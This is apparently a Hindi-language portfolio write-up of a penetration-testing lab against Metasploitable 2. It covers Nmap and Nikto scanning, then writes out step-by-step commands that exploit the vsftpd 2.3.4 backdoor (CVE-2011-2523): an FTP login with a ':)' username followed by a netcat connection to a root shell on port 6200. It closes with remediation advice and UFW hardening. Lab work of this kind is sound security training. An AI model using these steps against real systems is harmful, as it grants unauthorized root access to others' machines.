
नियंत्रित वर्चुअल आक्रमण एवं रक्षा प्रयोगशाला — CVE-2011-2523 शोषण, Nmap पुनर्ज्ञान, Nikto स्कैनिंग, Metasploitable 2 पर UFW सख्तीकरण
एक नियंत्रित आभासी वातावरण जो वास्तविक दुनिया के हमले और बचाव परिदृश्यों का अनुकरण करता है
यह प्रयोगशाला एक पूरी तरह से पृथक आभासी वातावरण में एक वास्तविक दुनिया के पैठ परीक्षण और रक्षात्मक कठोरीकरण अभ्यास का अनुकरण करती है। यह आक्रामक सुरक्षा जीवनचक्र को प्रदर्शित करती है — खोज से लेकर शोषण तक — और रक्षात्मक नियंत्रण जो प्रत्येक जोखिम को कम करेगा।
मुख्य परिणाम: बिना किसी क्रेडेंशियल या विशेष उपकरणों के, एक ज्ञात बैकडोर का शोषण करके 60 सेकंड से कम समय में लक्ष्य मशीन पर पूर्ण रूट पहुंच प्राप्त की।
| घटक | विवरण |
|---|---|
| हाइपरवाइजर | VMware Workstation |
| नेटवर्क | होस्ट-ओनली / NAT (पूरी तरह पृथक) |
| हमलावर ओएस | Ubuntu 24 LTS |
| लक्ष्य ओएस | Metasploitable 2 (Linux 2.6.x) |
| हमलावर आईपी | 192.168.148.255 |
| लक्ष्य आईपी | 192.168.148.130 |
Reconnaissance → Scanning → Exploitation → Defense & Hardening
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt
मुख्य निष्कर्ष — कुल 23 खुले पोर्ट:
nikto -h http://192.168.148.130 -o nikto_before.txt
18 कमजोरियाँ पाई गईं, जिनमें शामिल हैं:
phpinfo.php पूर्ण सर्वर कॉन्फ़िगरेशन लीक कर रहा है/doc/, /test/ पर निर्देशिका अनुक्रमण सक्षमvsftpd 2.3.4 में आपूर्ति श्रृंखला समझौते के माध्यम से पेश किया गया एक बैकडोर है। :) में समाप्त होने वाले उपयोगकर्ता नाम को भेजने से सर्वर पोर्ट 6200 पर एक रूट शेल खोलता है।
# Step 1 — Trigger the backdoor via FTP
ftp 192.168.148.130
# Username: backdoor:) Password: anything
# Step 2 — Connect to the spawned shell
nc 192.168.148.130 6200
# Step 3 — Verify access
whoami
# → root
परिणाम: < 60 सेकंड में पूर्ण रूट-स्तरीय सिस्टम पहुंच प्राप्त हुई — कोई क्रेडेंशियल, कोई शोषण ढांचा आवश्यक नहीं।
प्रभाव: रूट पहुंच वाला हमलावर किसी भी फ़ाइल को पढ़/संशोधित/हटा सकता है, मैलवेयर स्थापित कर सकता है, डेटा बाहर निकाल सकता है, या नेटवर्क पर अन्य होस्ट पर पैंतरेबाज़ी कर सकता है।
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp # SSH only
sudo ufw status verbose
पूर्ण मूल्यांकन के लिए report.md देखें — पूर्ण कार्यप्रणाली, कमांड आउटपुट, निष्कर्ष तालिका, शोषण चरण, और सभी उपचार अनुशंसाएँ।
यह प्रयोगशाला जानबूझकर कमजोर सॉफ्टवेयर (Metasploitable 2) का उपयोग करके पूरी तरह से पृथक आभासी वातावरण में संचालित की गई थी। सभी तकनीकें केवल शैक्षिक और पोर्टफोलियो उद्देश्यों के लिए हैं। उन सिस्टमों पर दोहराएं नहीं जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है।
लेखक: Amir Mohammad Marwi
| पोर्ट | सेवा | संस्करण | जोखिम |
|---|
| 21 | FTP | vsftpd 2.3.4 | 🔴 गंभीर — ज्ञात बैकडोर (CVE-2011-2523) |
| 22 | SSH | OpenSSH 4.7p1 | 🟡 मध्यम — पुराना |
| 23 | Telnet | Linux telnetd | 🟠 उच्च — सादा पाठ प्रोटोकॉल |
| 80 | HTTP | Apache 2.2.8 | 🟠 उच्च — एकाधिक CVE |
| 1524 | Bindshell | रूट शेल | 🔴 गंभीर — खुला रूट शेल |
| 3306 | MySQL | 5.0.51a | 🟠 उच्च — डेटाबेस उजागर |
| 5900 | VNC | Protocol 3.3 | 🟠 उच्च — कमजोर प्रमाणीकरण |
| 6667 | IRC | UnrealIRCd | 🔴 गंभीर — ज्ञात बैकडोर |
| कमजोरी | समाधान |
|---|
| vsftpd 2.3.4 बैकडोर | vsftpd 3.x में अपग्रेड करें या SFTP पर माइग्रेट करें |
| खुला रूट शेल (पोर्ट 1524) | तुरंत अक्षम करें, स्थापना का ऑडिट करें |
| Telnet (पोर्ट 23) | अक्षम करें — केवल SSH लागू करें |
| phpMyAdmin उजागर | IP द्वारा प्रतिबंधित करें, मजबूत प्रमाणीकरण आवश्यक है |
| MySQL उजागर (पोर्ट 3306) | localhost से बाइंड करें, बाहरी पहुंच को अवरुद्ध करें |
| VNC उजागर (पोर्ट 5900) | IP द्वारा प्रतिबंधित करें या अक्षम करें |
| निर्देशिका अनुक्रमण | Apache: Options -Indexes |
| HTTP TRACE | Apache: TraceEnable off |
| पुराना Apache + PHP | समर्थित LTS संस्करणों में अपग्रेड करें |
| उपकरण | उद्देश्य |
|---|
| Nmap | पोर्ट स्कैनिंग और सेवा का पता लगाना |
| Nikto | वेब कमजोरी स्कैनिंग |
| Netcat | बैकडोर शेल से कनेक्ट करना |
| UFW | होस्ट-आधारित फ़ायरवॉल कॉन्फ़िगरेशन |
| FTP क्लाइंट | vsftpd बैकडोर को ट्रिगर करना |
| VMware Workstation | प्रयोगशाला वर्चुअलाइजेशन |